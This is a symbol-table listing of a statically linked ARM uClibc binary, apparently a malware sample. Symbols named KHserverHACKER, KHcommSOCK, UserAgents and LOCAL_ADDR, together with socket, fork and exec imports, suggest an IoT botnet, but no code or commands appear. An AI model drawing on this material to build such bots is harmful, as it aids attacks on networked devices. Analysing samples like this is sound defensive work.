$d	.symtab	0x20760	0	NOTYPE	<unknown>	DEFAULT	4
$d	.symtab	0x166a4	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x2f58c	0	NOTYPE	<unknown>	DEFAULT	10
$d	.symtab	0x166bc	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x16a44	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x16cb8	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x17054	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x17c40	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x2078c	0	NOTYPE	<unknown>	DEFAULT	4
$d	.symtab	0x17d10	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x17dac	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x17ed4	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x180ac	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x181f8	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x1880c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x18970	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x18a4c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x18bd8	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x18d0c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x18fdc	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x19018	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x199b4	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x19ebc	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x1a268	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x1aaac	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x1ab20	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x1ab60	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x1af2c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x1afd8	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x1b6c0	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x1b89c	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x1b948	0	NOTYPE	<unknown>	DEFAULT	2
$d	.symtab	0x29334	0	NOTYPE	<unknown>	DEFAULT	9
/home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
/home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
/home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
/home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
/home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
/home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
/home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
/home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
/home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
C.1.3452	.symtab	0x20760	24	OBJECT	<unknown>	DEFAULT	4
C.147.6056	.symtab	0x1ea40	40	OBJECT	<unknown>	DEFAULT	4
C.177.6343	.symtab	0x1eaac	16	OBJECT	<unknown>	DEFAULT	4
C.178.6344	.symtab	0x1ea80	20	OBJECT	<unknown>	DEFAULT	4
KHcommSOCK	.symtab	0x2935c	4	OBJECT	<unknown>	DEFAULT	10
KHserverHACKER	.symtab	0x290cc	4	OBJECT	<unknown>	DEFAULT	9
LOCAL_ADDR	.symtab	0x2f5b8	4	OBJECT	<unknown>	DEFAULT	10
Laligned	.symtab	0x13068	0	NOTYPE	<unknown>	DEFAULT	2
Llastword	.symtab	0x13084	0	NOTYPE	<unknown>	DEFAULT	2
Q	.symtab	0x29378	16384	OBJECT	<unknown>	DEFAULT	10
UserAgents	.symtab	0x2903c	144	OBJECT	<unknown>	DEFAULT	9
_Exit	.symtab	0x11c48	40	FUNC	<unknown>	DEFAULT	2
_Jv_RegisterClasses	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
_READ.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_WRITE.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__CTOR_END__	.symtab	0x29008	0	OBJECT	<unknown>	DEFAULT	6
__CTOR_LIST__	.symtab	0x29004	0	OBJECT	<unknown>	DEFAULT	6
__C_ctype_b	.symtab	0x290e0	4	OBJECT	<unknown>	DEFAULT	9
__C_ctype_b.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__C_ctype_b_data	.symtab	0x1f4b8	768	OBJECT	<unknown>	DEFAULT	4
__C_ctype_tolower	.symtab	0x29334	4	OBJECT	<unknown>	DEFAULT	9
__C_ctype_tolower.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__C_ctype_tolower_data	.symtab	0x20858	768	OBJECT	<unknown>	DEFAULT	4
__C_ctype_toupper	.symtab	0x290e8	4	OBJECT	<unknown>	DEFAULT	9
__C_ctype_toupper.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__C_ctype_toupper_data	.symtab	0x1f7b8	768	OBJECT	<unknown>	DEFAULT	4
__DTOR_END__	.symtab	0x29010	0	OBJECT	<unknown>	DEFAULT	7
__DTOR_LIST__	.symtab	0x2900c	0	OBJECT	<unknown>	DEFAULT	7
__EH_FRAME_BEGIN__	.symtab	0x29000	0	OBJECT	<unknown>	DEFAULT	5
__FRAME_END__	.symtab	0x29000	0	OBJECT	<unknown>	DEFAULT	5
__GI___C_ctype_b	.symtab	0x290e0	4	OBJECT	<unknown>	HIDDEN	9
__GI___C_ctype_tolower	.symtab	0x29334	4	OBJECT	<unknown>	HIDDEN	9
__GI___C_ctype_toupper	.symtab	0x290e8	4	OBJECT	<unknown>	HIDDEN	9
__GI___ctype_b	.symtab	0x290e4	4	OBJECT	<unknown>	HIDDEN	9
__GI___ctype_tolower	.symtab	0x29338	4	OBJECT	<unknown>	HIDDEN	9
__GI___ctype_toupper	.symtab	0x290ec	4	OBJECT	<unknown>	HIDDEN	9
__GI___errno_location	.symtab	0x11d00	12	FUNC	<unknown>	HIDDEN	2
__GI___fcntl_nocancel	.symtab	0x11b68	100	FUNC	<unknown>	HIDDEN	2
__GI___fgetc_unlocked	.symtab	0x180cc	304	FUNC	<unknown>	HIDDEN	2
__GI___glibc_strerror_r	.symtab	0x13488	20	FUNC	<unknown>	HIDDEN	2
__GI___h_errno_location	.symtab	0x166b4	12	FUNC	<unknown>	HIDDEN	2
__GI___libc_fcntl	.symtab	0x11b04	100	FUNC	<unknown>	HIDDEN	2
__GI___sigaddset	.symtab	0x139bc	36	FUNC	<unknown>	HIDDEN	2
__GI___sigdelset	.symtab	0x139e0	36	FUNC	<unknown>	HIDDEN	2
__GI___sigismember	.symtab	0x13998	36	FUNC	<unknown>	HIDDEN	2
__GI___uClibc_fini	.symtab	0x15ca4	108	FUNC	<unknown>	HIDDEN	2
__GI___uClibc_init	.symtab	0x15d48	76	FUNC	<unknown>	HIDDEN	2
__GI___xpg_strerror_r	.symtab	0x134a8	232	FUNC	<unknown>	HIDDEN	2
__GI__exit	.symtab	0x11c48	40	FUNC	<unknown>	HIDDEN	2
__GI_abort	.symtab	0x14bb0	256	FUNC	<unknown>	HIDDEN	2
__GI_atoi	.symtab	0x151cc	12	FUNC	<unknown>	HIDDEN	2
__GI_brk	.symtab	0x18fe4	56	FUNC	<unknown>	HIDDEN	2
__GI_clock_getres	.symtab	0x161a4	44	FUNC	<unknown>	HIDDEN	2
__GI_close	.symtab	0x11ca0	44	FUNC	<unknown>	HIDDEN	2
__GI_closedir	.symtab	0x16320	212	FUNC	<unknown>	HIDDEN	2
__GI_config_close	.symtab	0x169e4	48	FUNC	<unknown>	HIDDEN	2
__GI_config_open	.symtab	0x16a14	52	FUNC	<unknown>	HIDDEN	2
__GI_config_read	.symtab	0x166c0	804	FUNC	<unknown>	HIDDEN	2
__GI_connect	.symtab	0x1370c	44	FUNC	<unknown>	HIDDEN	2
__GI_dup2	.symtab	0x118f0	44	FUNC	<unknown>	HIDDEN	2
__GI_errno	.symtab	0x2f58c	4	OBJECT	<unknown>	HIDDEN	10
__GI_execl	.symtab	0x15b8c	148	FUNC	<unknown>	HIDDEN	2
__GI_execve	.symtab	0x16158	44	FUNC	<unknown>	HIDDEN	2
__GI_exit	.symtab	0x15378	148	FUNC	<unknown>	HIDDEN	2
__GI_fclose	.symtab	0x16b64	368	FUNC	<unknown>	HIDDEN	2
__GI_fcntl	.symtab	0x11b04	100	FUNC	<unknown>	HIDDEN	2
__GI_fflush_unlocked	.symtab	0x17efc	464	FUNC	<unknown>	HIDDEN	2
__GI_fgetc	.symtab	0x17c64	188	FUNC	<unknown>	HIDDEN	2
__GI_fgetc_unlocked	.symtab	0x180cc	304	FUNC	<unknown>	HIDDEN	2
__GI_fgets	.symtab	0x17d20	156	FUNC	<unknown>	HIDDEN	2
__GI_fgets_unlocked	.symtab	0x181fc	148	FUNC	<unknown>	HIDDEN	2
__GI_fopen	.symtab	0x16cd4	12	FUNC	<unknown>	HIDDEN	2
__GI_fork	.symtab	0x119f4	44	FUNC	<unknown>	HIDDEN	2
__GI_fputs_unlocked	.symtab	0x12ebc	52	FUNC	<unknown>	HIDDEN	2
__GI_fseek	.symtab	0x19880	12	FUNC	<unknown>	HIDDEN	2
__GI_fseeko64	.symtab	0x1988c	312	FUNC	<unknown>	HIDDEN	2
__GI_fstat	.symtab	0x1901c	80	FUNC	<unknown>	HIDDEN	2
__GI_fwrite_unlocked	.symtab	0x12ef0	172	FUNC	<unknown>	HIDDEN	2
__GI_getc_unlocked	.symtab	0x180cc	304	FUNC	<unknown>	HIDDEN	2
__GI_getdtablesize	.symtab	0x11ab0	40	FUNC	<unknown>	HIDDEN	2
__GI_getegid	.symtab	0x161fc	8	FUNC	<unknown>	HIDDEN	2
__GI_geteuid	.symtab	0x119ec	8	FUNC	<unknown>	HIDDEN	2
__GI_getgid	.symtab	0x1625c	8	FUNC	<unknown>	HIDDEN	2
__GI_gethostbyname	.symtab	0x136b4	8	FUNC	<unknown>	HIDDEN	2
__GI_gethostbyname2	.symtab	0x136bc	80	FUNC	<unknown>	HIDDEN	2
__GI_gethostbyname2_r	.symtab	0x18d10	664	FUNC	<unknown>	HIDDEN	2
__GI_gethostbyname_r	.symtab	0x1b034	756	FUNC	<unknown>	HIDDEN	2
__GI_gethostname	.symtab	0x1b354	112	FUNC	<unknown>	HIDDEN	2
__GI_getpagesize	.symtab	0x16184	24	FUNC	<unknown>	HIDDEN	2
__GI_getpid	.symtab	0x119ac	8	FUNC	<unknown>	HIDDEN	2
__GI_getrlimit	.symtab	0x161d0	44	FUNC	<unknown>	HIDDEN	2
__GI_getsockname	.symtab	0x13738	44	FUNC	<unknown>	HIDDEN	2
__GI_getuid	.symtab	0x1619c	8	FUNC	<unknown>	HIDDEN	2
__GI_h_errno	.symtab	0x2f590	4	OBJECT	<unknown>	HIDDEN	10
__GI_htonl	.symtab	0x1363c	32	FUNC	<unknown>	HIDDEN	2
__GI_htons	.symtab	0x13628	20	FUNC	<unknown>	HIDDEN	2
__GI_inet_addr	.symtab	0x13690	36	FUNC	<unknown>	HIDDEN	2
__GI_inet_aton	.symtab	0x18c20	240	FUNC	<unknown>	HIDDEN	2
__GI_inet_ntop	.symtab	0x1a004	620	FUNC	<unknown>	HIDDEN	2
__GI_inet_pton	.symtab	0x19cc4	512	FUNC	<unknown>	HIDDEN	2
__GI_initstate_r	.symtab	0x15104	200	FUNC	<unknown>	HIDDEN	2
__GI_ioctl	.symtab	0x11bf8	80	FUNC	<unknown>	HIDDEN	2
__GI_isatty	.symtab	0x13590	32	FUNC	<unknown>	HIDDEN	2
__GI_kill	.symtab	0x11ad8	44	FUNC	<unknown>	HIDDEN	2
__GI_lseek64	.symtab	0x1b414	100	FUNC	<unknown>	HIDDEN	2
__GI_memchr	.symtab	0x18720	244	FUNC	<unknown>	HIDDEN	2
__GI_memcpy	.symtab	0x130d0	4	FUNC	<unknown>	HIDDEN	2
__GI_memmove	.symtab	0x1b480	4	FUNC	<unknown>	HIDDEN	2
__GI_mempcpy	.symtab	0x18ae0	24	FUNC	<unknown>	HIDDEN	2
__GI_memrchr	.symtab	0x18978	220	FUNC	<unknown>	HIDDEN	2
__GI_memset	.symtab	0x12fa0	156	FUNC	<unknown>	HIDDEN	2
__GI_mmap	.symtab	0x16034	96	FUNC	<unknown>	HIDDEN	2
__GI_mremap	.symtab	0x162bc	48	FUNC	<unknown>	HIDDEN	2
__GI_munmap	.symtab	0x16264	44	FUNC	<unknown>	HIDDEN	2
__GI_nanosleep	.symtab	0x16290	44	FUNC	<unknown>	HIDDEN	2
__GI_ntohl	.symtab	0x13670	32	FUNC	<unknown>	HIDDEN	2
__GI_ntohs	.symtab	0x1365c	20	FUNC	<unknown>	HIDDEN	2
__GI_open	.symtab	0x11924	92	FUNC	<unknown>	HIDDEN	2
__GI_opendir	.symtab	0x164b0	156	FUNC	<unknown>	HIDDEN	2
__GI_pipe	.symtab	0x11980	44	FUNC	<unknown>	HIDDEN	2
__GI_poll	.symtab	0x1b328	44	FUNC	<unknown>	HIDDEN	2
__GI_raise	.symtab	0x18fa8	24	FUNC	<unknown>	HIDDEN	2
__GI_random	.symtab	0x14cb4	124	FUNC	<unknown>	HIDDEN	2
__GI_random_r	.symtab	0x14f98	140	FUNC	<unknown>	HIDDEN	2
__GI_rawmemchr	.symtab	0x188c8	176	FUNC	<unknown>	HIDDEN	2
__GI_read	.symtab	0x11a84	44	FUNC	<unknown>	HIDDEN	2
__GI_readdir64	.symtab	0x165e0	212	FUNC	<unknown>	HIDDEN	2
__GI_recv	.symtab	0x13794	44	FUNC	<unknown>	HIDDEN	2
__GI_recvfrom	.symtab	0x137c0	52	FUNC	<unknown>	HIDDEN	2
__GI_sbrk	.symtab	0x16204	88	FUNC	<unknown>	HIDDEN	2
__GI_select	.symtab	0x11a54	48	FUNC	<unknown>	HIDDEN	2
__GI_send	.symtab	0x137f4	44	FUNC	<unknown>	HIDDEN	2
__GI_sendto	.symtab	0x13820	52	FUNC	<unknown>	HIDDEN	2
__GI_setsockopt	.symtab	0x13854	48	FUNC	<unknown>	HIDDEN	2
__GI_setstate_r	.symtab	0x14ed0	200	FUNC	<unknown>	HIDDEN	2
__GI_sigaction	.symtab	0x160b0	116	FUNC	<unknown>	HIDDEN	2
__GI_sigaddset	.symtab	0x138b0	48	FUNC	<unknown>	HIDDEN	2
__GI_sigemptyset	.symtab	0x138e0	20	FUNC	<unknown>	HIDDEN	2
__GI_signal	.symtab	0x138f4	164	FUNC	<unknown>	HIDDEN	2
__GI_sigprocmask	.symtab	0x11c70	48	FUNC	<unknown>	HIDDEN	2
__GI_sleep	.symtab	0x1540c	168	FUNC	<unknown>	HIDDEN	2
__GI_socket	.symtab	0x13884	44	FUNC	<unknown>	HIDDEN	2
__GI_sprintf	.symtab	0x11d3c	52	FUNC	<unknown>	HIDDEN	2
__GI_srandom_r	.symtab	0x15024	224	FUNC	<unknown>	HIDDEN	2
__GI_stat	.symtab	0x1b3c4	80	FUNC	<unknown>	HIDDEN	2
__GI_strcasecmp	.symtab	0x1b8d0	124	FUNC	<unknown>	HIDDEN	2
__GI_strchr	.symtab	0x1339c	236	FUNC	<unknown>	HIDDEN	2
__GI_strchrnul	.symtab	0x18af8	232	FUNC	<unknown>	HIDDEN	2
__GI_strcmp	.symtab	0x130b0	28	FUNC	<unknown>	HIDDEN	2
__GI_strcoll	.symtab	0x130b0	28	FUNC	<unknown>	HIDDEN	2
__GI_strcpy	.symtab	0x132c0	36	FUNC	<unknown>	HIDDEN	2
__GI_strcspn	.symtab	0x18888	64	FUNC	<unknown>	HIDDEN	2
__GI_strdup	.symtab	0x1b490	48	FUNC	<unknown>	HIDDEN	2
__GI_strlen	.symtab	0x13040	96	FUNC	<unknown>	HIDDEN	2
__GI_strncpy	.symtab	0x132e4	184	FUNC	<unknown>	HIDDEN	2
__GI_strnlen	.symtab	0x131e8	216	FUNC	<unknown>	HIDDEN	2
__GI_strpbrk	.symtab	0x18be0	64	FUNC	<unknown>	HIDDEN	2
__GI_strrchr	.symtab	0x18a9c	68	FUNC	<unknown>	HIDDEN	2
__GI_strspn	.symtab	0x18a54	72	FUNC	<unknown>	HIDDEN	2
__GI_strstr	.symtab	0x130f0	248	FUNC	<unknown>	HIDDEN	2
__GI_strtok	.symtab	0x1349c	12	FUNC	<unknown>	HIDDEN	2
__GI_strtok_r	.symtab	0x18814	116	FUNC	<unknown>	HIDDEN	2
__GI_strtol	.symtab	0x151d8	8	FUNC	<unknown>	HIDDEN	2
__GI_sysconf	.symtab	0x155cc	1472	FUNC	<unknown>	HIDDEN	2
__GI_tcgetattr	.symtab	0x135b0	120	FUNC	<unknown>	HIDDEN	2
__GI_time	.symtab	0x119b4	8	FUNC	<unknown>	HIDDEN	2
__GI_times	.symtab	0x162ec	8	FUNC	<unknown>	HIDDEN	2
__GI_toupper	.symtab	0x11ccc	52	FUNC	<unknown>	HIDDEN	2
__GI_uname	.symtab	0x1b8a4	44	FUNC	<unknown>	HIDDEN	2
__GI_vfork	.symtab	0x118c0	40	FUNC	<unknown>	HIDDEN	2
__GI_vsnprintf	.symtab	0x11d70	180	FUNC	<unknown>	HIDDEN	2
__GI_wait4	.symtab	0x1612c	44	FUNC	<unknown>	HIDDEN	2
__GI_waitpid	.symtab	0x11a20	8	FUNC	<unknown>	HIDDEN	2
__GI_wcrtomb	.symtab	0x16a48	80	FUNC	<unknown>	HIDDEN	2
__GI_wcsnrtombs	.symtab	0x16ab8	172	FUNC	<unknown>	HIDDEN	2
__GI_wcsrtombs	.symtab	0x16a98	32	FUNC	<unknown>	HIDDEN	2
__GI_write	.symtab	0x11bcc	44	FUNC	<unknown>	HIDDEN	2
__JCR_END__	.symtab	0x29014	0	OBJECT	<unknown>	DEFAULT	8
__JCR_LIST__	.symtab	0x29014	0	OBJECT	<unknown>	DEFAULT	8
__adddf3	.symtab	0x1bb40	736	FUNC	<unknown>	HIDDEN	2
__aeabi_cdcmpeq	.symtab	0x1c510	20	FUNC	<unknown>	HIDDEN	2
__aeabi_cdcmple	.symtab	0x1c510	20	FUNC	<unknown>	HIDDEN	2
__aeabi_cdrcmple	.symtab	0x1c4f4	48	FUNC	<unknown>	HIDDEN	2
__aeabi_d2uiz	.symtab	0x1c588	84	FUNC	<unknown>	HIDDEN	2
__aeabi_dadd	.symtab	0x1bb40	736	FUNC	<unknown>	HIDDEN	2
__aeabi_dcmpeq	.symtab	0x1c524	20	FUNC	<unknown>	HIDDEN	2
__aeabi_dcmpge	.symtab	0x1c560	20	FUNC	<unknown>	HIDDEN	2
__aeabi_dcmpgt	.symtab	0x1c574	20	FUNC	<unknown>	HIDDEN	2
__aeabi_dcmple	.symtab	0x1c54c	20	FUNC	<unknown>	HIDDEN	2
__aeabi_dcmplt	.symtab	0x1c538	20	FUNC	<unknown>	HIDDEN	2
__aeabi_ddiv	.symtab	0x1c25c	516	FUNC	<unknown>	HIDDEN	2
__aeabi_dmul	.symtab	0x1bf34	808	FUNC	<unknown>	HIDDEN	2
__aeabi_drsub	.symtab	0x1bb34	0	FUNC	<unknown>	HIDDEN	2
__aeabi_dsub	.symtab	0x1bb3c	740	FUNC	<unknown>	HIDDEN	2
__aeabi_f2d	.symtab	0x1be74	64	FUNC	<unknown>	HIDDEN	2
__aeabi_i2d	.symtab	0x1be48	44	FUNC	<unknown>	HIDDEN	2
__aeabi_idiv	.symtab	0x1b9f4	0	FUNC	<unknown>	HIDDEN	2
__aeabi_idiv0	.symtab	0x11870	4	FUNC	<unknown>	HIDDEN	2
__aeabi_idivmod	.symtab	0x1bb1c	24	FUNC	<unknown>	HIDDEN	2
__aeabi_l2d	.symtab	0x1bec8	108	FUNC	<unknown>	HIDDEN	2
__aeabi_ldiv0	.symtab	0x11870	4	FUNC	<unknown>	HIDDEN	2
__aeabi_ui2d	.symtab	0x1be20	40	FUNC	<unknown>	HIDDEN	2
__aeabi_uidiv	.symtab	0x115b0	0	FUNC	<unknown>	HIDDEN	2
__aeabi_uidivmod	.symtab	0x116a8	24	FUNC	<unknown>	HIDDEN	2
__aeabi_ul2d	.symtab	0x1beb4	128	FUNC	<unknown>	HIDDEN	2
__app_fini	.symtab	0x2f584	4	OBJECT	<unknown>	HIDDEN	10
__atexit_lock	.symtab	0x2930c	24	OBJECT	<unknown>	DEFAULT	9
__bss_end__	.symtab	0x2faa8	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__bss_start	.symtab	0x29340	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__bss_start__	.symtab	0x29340	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__check_one_fd	.symtab	0x15d10	56	FUNC	<unknown>	DEFAULT	2
__close_nameservers	.symtab	0x1af70	124	FUNC	<unknown>	HIDDEN	2
__cmpdf2	.symtab	0x1c470	132	FUNC	<unknown>	HIDDEN	2
__ctype_b	.symtab	0x290e4	4	OBJECT	<unknown>	DEFAULT	9
__ctype_tolower	.symtab	0x29338	4	OBJECT	<unknown>	DEFAULT	9
__ctype_toupper	.symtab	0x290ec	4	OBJECT	<unknown>	DEFAULT	9
__curbrk	.symtab	0x2f594	4	OBJECT	<unknown>	HIDDEN	10
__data_start	.symtab	0x29018	0	NOTYPE	<unknown>	DEFAULT	9
__decode_dotted	.symtab	0x1a270	244	FUNC	<unknown>	HIDDEN	2
__decode_header	.symtab	0x1b5a8	180	FUNC	<unknown>	HIDDEN	2
__default_rt_sa_restorer	.symtab	0x16128	0	FUNC	<unknown>	DEFAULT	2
__default_sa_restorer	.symtab	0x16124	0	FUNC	<unknown>	DEFAULT	2
__deregister_frame_info	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__div0	.symtab	0x11870	4	FUNC	<unknown>	HIDDEN	2
__divdf3	.symtab	0x1c25c	516	FUNC	<unknown>	HIDDEN	2
__divsi3	.symtab	0x1b9f4	296	FUNC	<unknown>	HIDDEN	2
__dns_lookup	.symtab	0x1a364	1920	FUNC	<unknown>	HIDDEN	2
__do_global_ctors_aux	.symtab	0x1c5dc	0	FUNC	<unknown>	DEFAULT	2
__do_global_dtors_aux	.symtab	0x80b0	0	FUNC	<unknown>	DEFAULT	2
__dso_handle	.symtab	0x2901c	0	OBJECT	<unknown>	HIDDEN	9
__encode_dotted	.symtab	0x1b94c	168	FUNC	<unknown>	HIDDEN	2
__encode_header	.symtab	0x1b4c0	232	FUNC	<unknown>	HIDDEN	2
__encode_question	.symtab	0x1b65c	92	FUNC	<unknown>	HIDDEN	2
__end__	.symtab	0x2faa8	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__environ	.symtab	0x2f57c	4	OBJECT	<unknown>	DEFAULT	10
__eqdf2	.symtab	0x1c470	132	FUNC	<unknown>	HIDDEN	2
__errno_location	.symtab	0x11d00	12	FUNC	<unknown>	DEFAULT	2
__errno_location.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__error	.symtab	0x118e4	0	NOTYPE	<unknown>	DEFAULT	2
__exit_cleanup	.symtab	0x2f574	4	OBJECT	<unknown>	HIDDEN	10
__extendsfdf2	.symtab	0x1be74	64	FUNC	<unknown>	HIDDEN	2
__fcntl_nocancel	.symtab	0x11b68	100	FUNC	<unknown>	DEFAULT	2
__fgetc_unlocked	.symtab	0x180cc	304	FUNC	<unknown>	DEFAULT	2
__fini_array_end	.symtab	0x29004	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__fini_array_start	.symtab	0x29004	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__fixunsdfsi	.symtab	0x1c588	84	FUNC	<unknown>	HIDDEN	2
__floatdidf	.symtab	0x1bec8	108	FUNC	<unknown>	HIDDEN	2
__floatsidf	.symtab	0x1be48	44	FUNC	<unknown>	HIDDEN	2
__floatundidf	.symtab	0x1beb4	128	FUNC	<unknown>	HIDDEN	2
__floatunsidf	.symtab	0x1be20	40	FUNC	<unknown>	HIDDEN	2
__gedf2	.symtab	0x1c460	148	FUNC	<unknown>	HIDDEN	2
__get_hosts_byname_r	.symtab	0x1afec	72	FUNC	<unknown>	HIDDEN	2
__getdents64	.symtab	0x19720	352	FUNC	<unknown>	HIDDEN	2
__getpagesize	.symtab	0x16184	24	FUNC	<unknown>	DEFAULT	2
__glibc_strerror_r	.symtab	0x13488	20	FUNC	<unknown>	DEFAULT	2
__glibc_strerror_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__gtdf2	.symtab	0x1c460	148	FUNC	<unknown>	HIDDEN	2
__h_errno_location	.symtab	0x166b4	12	FUNC	<unknown>	DEFAULT	2
__h_errno_location.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__init_array_end	.symtab	0x29004	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__init_array_start	.symtab	0x29004	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__ledf2	.symtab	0x1c468	140	FUNC	<unknown>	HIDDEN	2
__libc_close	.symtab	0x11ca0	44	FUNC	<unknown>	DEFAULT	2
__libc_connect	.symtab	0x1370c	44	FUNC	<unknown>	DEFAULT	2
__libc_fcntl	.symtab	0x11b04	100	FUNC	<unknown>	DEFAULT	2
__libc_fork	.symtab	0x119f4	44	FUNC	<unknown>	DEFAULT	2
__libc_lseek64	.symtab	0x1b414	100	FUNC	<unknown>	DEFAULT	2
__libc_nanosleep	.symtab	0x16290	44	FUNC	<unknown>	DEFAULT	2
__libc_open	.symtab	0x11924	92	FUNC	<unknown>	DEFAULT	2
__libc_read	.symtab	0x11a84	44	FUNC	<unknown>	DEFAULT	2
__libc_recv	.symtab	0x13794	44	FUNC	<unknown>	DEFAULT	2
__libc_recvfrom	.symtab	0x137c0	52	FUNC	<unknown>	DEFAULT	2
__libc_select	.symtab	0x11a54	48	FUNC	<unknown>	DEFAULT	2
__libc_send	.symtab	0x137f4	44	FUNC	<unknown>	DEFAULT	2
__libc_sendto	.symtab	0x13820	52	FUNC	<unknown>	DEFAULT	2
__libc_sigaction	.symtab	0x160b0	116	FUNC	<unknown>	DEFAULT	2
__libc_stack_end	.symtab	0x2f578	4	OBJECT	<unknown>	DEFAULT	10
__libc_waitpid	.symtab	0x11a20	8	FUNC	<unknown>	DEFAULT	2
__libc_write	.symtab	0x11bcc	44	FUNC	<unknown>	DEFAULT	2
__local_nameserver	.symtab	0x20838	16	OBJECT	<unknown>	HIDDEN	4
__ltdf2	.symtab	0x1c468	140	FUNC	<unknown>	HIDDEN	2
__malloc_consolidate	.symtab	0x147d8	424	FUNC	<unknown>	HIDDEN	2
__malloc_largebin_index	.symtab	0x13a04	120	FUNC	<unknown>	DEFAULT	2
__malloc_lock	.symtab	0x29230	24	OBJECT	<unknown>	DEFAULT	9
__malloc_state	.symtab	0x2f714	888	OBJECT	<unknown>	DEFAULT	10
__malloc_trim	.symtab	0x14734	164	FUNC	<unknown>	DEFAULT	2
__modsi3	.symtab	0x1178c	228	FUNC	<unknown>	HIDDEN	2
__muldf3	.symtab	0x1bf34	808	FUNC	<unknown>	HIDDEN	2
__muldi3	.symtab	0x11874	72	FUNC	<unknown>	HIDDEN	2
__nameserver	.symtab	0x2fa9c	4	OBJECT	<unknown>	HIDDEN	10
__nameservers	.symtab	0x2faa0	4	OBJECT	<unknown>	HIDDEN	10
__nedf2	.symtab	0x1c470	132	FUNC	<unknown>	HIDDEN	2
__open_etc_hosts	.symtab	0x1b6b8	12	FUNC	<unknown>	HIDDEN	2
__open_nameservers	.symtab	0x1ab64	1036	FUNC	<unknown>	HIDDEN	2
__pagesize	.symtab	0x2f580	4	OBJECT	<unknown>	DEFAULT	10
__preinit_array_end	.symtab	0x29004	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__preinit_array_start	.symtab	0x29004	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__progname	.symtab	0x29328	4	OBJECT	<unknown>	DEFAULT	9
__progname_full	.symtab	0x2932c	4	OBJECT	<unknown>	DEFAULT	9
__pthread_initialize_minimal	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__pthread_mutex_init	.symtab	0x15c74	8	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_lock	.symtab	0x15c6c	8	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_trylock	.symtab	0x15c6c	8	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_unlock	.symtab	0x15c6c	8	FUNC	<unknown>	DEFAULT	2
